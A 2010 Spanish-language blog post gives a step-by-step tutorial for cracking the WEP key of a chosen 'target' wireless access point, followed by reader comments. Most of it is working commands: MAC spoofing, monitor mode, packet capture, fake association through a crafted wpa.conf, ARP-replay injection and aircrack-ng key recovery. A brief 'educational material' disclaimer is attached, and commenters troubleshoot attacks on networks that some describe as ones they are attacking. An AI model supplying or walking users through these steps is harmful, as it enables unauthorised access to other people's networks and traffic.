Tener Muchos Amigos = Mucho $$$$

El portal que comparte sus ingresos

31 ene 2010

WifiWay 1.0 para Intel 4965 AGN (Seguridad Wireless)

Por fin, meses y meses buscando esta informaciòn de MUCHA UTILIDAD para todos aquellos que nos gusta experimentar con la seguridad wireless, ya sea por investigacion o pasatiempo, pues bueno hoy por fin encontre un material y lo puse a la practica con efectividad del 100% para este tipo de tarjeta inalambrica que en un principio era una lata, por que no habia compatibilidad con dicho programa (WifiWay1.0 de linux del CDLIVE que lo pueden descargar del siguiente sitio http://www.seguridadwireless.net) MATERIAL EDUCATIVO CADA QUIEN ES RESPONSABLE DEL SU USO.

Los pasos son los siguientes:

  1.  Lo de ley, introducir el CD-LIVE  de Wifiway, configuraciones previas de teclado, hora etc etc...startx y empezara entrar en entorno grafico
  2. Si prefieren usar Ubuntu o similares , en terminal tendran que estar logeados como ROOT , en este caso el CD-LIVE ya esta por defecto como ROOT.
  3. Abrir una terminal , empezaremos por dar de baja la interfas del wireless para cambiar su configuracion

    #ifconfig wlan0 down
  4. Luego nos disponemos a cambiar la Mac :

    #macchanger -m 00:11:"22:33:44:55 wlan0
  5. Verificamos que la interfaz este en modo MANAGED

    #iwconfig wlan0
  6. Y damos de alta otra vez la interfaz de wlan0

    #ifconfig wlan0 up
  7. Escaneamos los AP(Access Point) y Creamos un archivo con el nombre wpa.conf en /root/swireless/ el cual modificaremos mas adelante
  8. Para escanear las conexiones de APs ponemos lo siguiente en la misma terminal:

    #iwlist wlan0 scan

    ////////////////NOTA \\\\\\\\\\\\\\\\\\\\\\
    la BSSID la van a ver cuando se scanean las conexiones AP , les recomiendo apuntar :SSID,BSSID,CHANNEL
  9. Creamos  el archivo y poniendo lo siguiente:

    network={
    ssid="Aqui vamos a copiar el nombre del AP objetivo"
    key_mgmt=NONE
    bssid=MAC DEL AP objetivo
    wep_key0="1234567890"
    }

    Y guardamos con el nombre ya dicho antes wpa.conf





10.  Despues de haber escaneado los APs y escogido un objetivo, se procede a crear la interfaz mon0 o monitor:

#airmon-ng start wlan0 channel 3

11. Iniciamos Airodump :

#airodump-ng -w captura --bssid macdelrouter -c 3 mon0


Nota :  CAPTURA es un archivo que se crea automaticamente para guardar registros

12.Abrimos otra terminal para hacer la ASOCIACION :

#wpa_supplicant -c/root/swireless/wpa.conf -Dwext -iwlan0 
 

13.En otra terminal hacemos la inyeccion :
#aireplay-ng -3 -b  macdelrouter -h 00:11:22:33:44:55 mon0

14. Por ultimo abrimos otra terminal y solo ponemos lo siguiente sin dar enter:

#aircrack-ng *.cap

Aqui habra que esperar que en la primera terminal nos den al menos 20,000paketes para poder descifrar la WEPKEY para tener mayor probabilidad de descifrarla. llegando a ese numero ahora si presionamos enter y por consiguiente hay que esperar uno minutos.




En este caso tardo casi hasta 30 minutos , depende mucho de la señal, si estan mas cerca tendran la suerte de descifrar la WEPKEY en menor tiempo. 
Pues espero les sirva este manualito, si tienen alguna duda dejen comentario y si les fue de utilidad tmb. XD



19 comentarios:

  1. hola disculpa mi ignorancia;pero me podrias decir
    como se crea el archivo network={
    ssid=
    key_mgmt=
    bssid=
    wep_key 0
    por favorrrrrrrrr

    ResponderEliminar
  2. RIgel Casarrubias16 feb 2010, 13:03:00

    Claro mi estimado :

    mira te vas a la carpeta de ARCHIVOS PERSONALES, puedes dar click en el icono de Wifiway en la esquina inferior izquierda y ahi encuentras ARCHIVOS PERSONALES, dentro de ahi se encuentran 2 CARPETAS la de DEsktop y la de SWIRELESS , te metes en la carpeta de SWIRELESS y das click DERECHO con tu mouse en cualquier parte dentro de la carpeta, se despliega una lista donde la primera es CREAR NUEVO y de ahi escoges ARCHIVO DE TEXTO y listo copias lo de network={ ... y acuerdate de modificarlo poner en ssid=el_nombre_delared y en bssid=lamac del router k vas atacar, y lo guardas como wpa.conf cualquier duda hasmela saber

    ResponderEliminar
  3. ( hola disculpa mi ignorancia;pero me podrias decir
    como se crea el archivo network={
    ssid=
    key_mgmt=
    bssid=
    wep_key 0
    por favorrrrrrrrr
    16/02/2010 12:38:00 )
    Hola nuevamente yo,solo para agradecerte la
    atencion,creo que me habia atorado en algo
    sencillo,pero con tu ayuda pude checar la seguridad de mi conexion y debo decir que funciona al 100% con la 4965 sin mas por el momento Gracias.

    ResponderEliminar
  4. De nada mi estimado y espero recomiendes mi Blog y seas parte de este gran inicio de ItNovaTech, espero seas un Fan mas :D saludos afectuosos y estamos para servir

    ResponderEliminar
  5. Que tal ... la pregunta es:

    que marca de Tarjetas de Red inalambricas utilizas ? lo que pasa es que yo utilizo el Backtrack 3 con una tarjeta Atheros y esa me la desifra en menos de 10 min.( sin hacer tanto show ¬¬)

    tenia entendido que no todas las tarjetas pueden hacer la inyeccion de datos.(modo promiscuo) pero si pudiste con otro de otra marca me avisas para calar este metodo zaz ?

    ResponderEliminar
  6. Que tal, mira el tiempo que hagas depende mucho en primero de la señal y los datos que se envian para generar las keys, la tarjeta que yo utilice en este casola de mi laptop es de INTEL 4965 y pues anteriormente esta tarjeta no es compatible con el bactrack ni conel wifislax, y la vd que tarde en encontrar un tutorial para que jalara con esta tarjeta hasta que lo consegui. y bueno detallando pasos aqui esta la solucion. lo minimo que he tardado en scar una key han sido de 7 a 12 min pero como mencione antes, depende de la señal, y para mi proximo tema hare una antena pigtail para esta tarjeta de INTEL y espero visiten para apreciar el proyecto.nos vmoes atte Rigel Casarrubias

    ResponderEliminar
  7. cumpa yo tengo ubuntu no se que debo hacer para correr el cd, hay que grabar la iso y bootear con el cd o no???? basta con eso ????

    ResponderEliminar
  8. muchisisisisisiismas gracias de verdad, me ha venido al pelo ! funciona estupendamente

    Un saludo

    ResponderEliminar
  9. a mi me va bien todo pero al final los #Data me suben muy poco a poco, sabes por qué debe ser? tengo el router a 2 metros y no creo que sea por la distancia, esto del Rate a mi me aparece 0-1, no sé si tendrá algo que ver

    ResponderEliminar
  10. xislet, no confuandas los pasos, puede que notes que estas avanzando en los data pero tiene que apareser en el segundo paso " try conection witch ............." y que inyecte con la tercer etapa luego de la segundo, veras que suben numeros pero cuando inyectes la 3 consola o etapa 3 subira datos en la parte izquierda como derecha y bajara como si fuese una cascada, pero solo lo realizas si el paso 2 esta en "conection" lo otro alguien debe estar ocupando el internet que atacas, en algunos casos podras sin que el usuario este conectado a su internet pero lo mejor es ke este conectado, si desencriptas tu propia wifi conecta otro pc si las pasos 2 y 3 estan bien

    pd: en la figura 4 si aprecian bien las "gato/s" esta en 162 y ya esta subiendo muchos paketes, sin hacer los pasos 2 y 3 esto sucede en algunos contados casos, eso quiere decir que capas no el que subio las fotos no estaba en coneccion con el usuario y lo descifro asi, yo diria que fue suerte por el sistema de seguridad de la lines que ataco, no se confundan

    ResponderEliminar
  11. si hsgo todo esto desde el cd-live, en el paso de la asociacion
    #wpa_supplicant -c/root/swireless/wpa.conf -Dwext -iwlan0
    ke unidad de disco pongo??xk cn "-c" no me va
    saludos

    ResponderEliminar
  12. Hola, genial el tutorial, creo que lo hago todo bien, hago una modificación, pongo el mac falso con el mismo canal del WEP que quiero atacar, pero al final, despues de casi una hora no recibo ni un solo paquete ARC, adjunto pantallazo

    Hola, genial el tutorial, creo que lo hago todo bien, hago una modificación, pongo el mac falso con el mismo canal del WEP que quiero atacar, pero al final, despues de casi una hora no recibo ni un solo paquete ARC, adjunto pantallazo

    http://comtedurgell.com/cajondesastre/pntallazo.png

    PD: tengo un dell XPS m1330 con la misma tarjeta de wifi, la link 4965agn

    PD: tengo un dell XPS m1330 con la misma tarjeta de wifi, la link 4965agn

    ResponderEliminar
  13. exelente tutorial , hago todo bien , lo ke ocurre es ke los datas suben muy despacito asi que para lograr 20.000 datas hay que esperar al menos 5 horas y esto es un follón , a k se debe estooo ??

    ResponderEliminar
  14. tras hacer lo del wpa.conf no asocia,no pone conected intente pero no ,que hago? gracias

    ResponderEliminar
  15. hola, a mi me pasa lo mismo. No me asocia el archivo. Tambien te queria comentar como se hace para escribir las llaves en el texto( {} ) porque no me deja escribirlas y no me reconoce nada del texto. los puntos anteriores salen bien pero me atasco ahí. Te agradeceria mucho que me hecharas una mano. un saludo

    ResponderEliminar
  16. sirve este tutorial para wpa o solamente es para wep

    ResponderEliminar
  17. hola
    gracias por el aporte
    mi problema es que no puedo crear el archivo wpa.conf porque no soy capaz de salir del wifiway a linux solo puedo variar de consolas con alt+f2
    alguien podria ayudarme nunca trabaje con linux
    perdonar mi ignorancia

    ResponderEliminar
  18. Holaaaa!!! estoy intentando segir los pasos y os tengo que agrdecer que hayais escrito todo porque me estaba volviendo loca con el chipset!!jeje

    la verdad, es que aun no lo he conseguido porque soy novatisima y ando un poco perdida!!!si me podeis ayudar os lo agradeceria infinito!!
    Mis preguntas son:

    1.Cuando creamos lo del archivo de texto del network=....
    cual es el nombre del AP?podría ser wlan xx??

    2.¿cómo se sabe el mac del rooter?

    Disculpar mi ignorancia!!!!

    Mil gracias chic@sssss

    ResponderEliminar
  19. Quisiera preguntar por que pude desencriptar la clave de una red una vez y ahora no puedo, al momento de hacer la inyeccion en la tercera terminal me sale la siguiente leyenda:

    The Internet MAC (la mac de mi router) doesn't match the specified MAC (-h).
    ifconfig mon0 hw ether 00a11:22:33:44:55
    please specify at least a bssid (-a) or an Essid (-e)

    y en la terminal 1 tarda mas de 4 o 5 hrs y apenas suben como 577 paquetes y la señal es buena esta cerca del router.

    alguien podria decirme si estoy hacuendo algo mal?

    saludos y gracias

    ResponderEliminar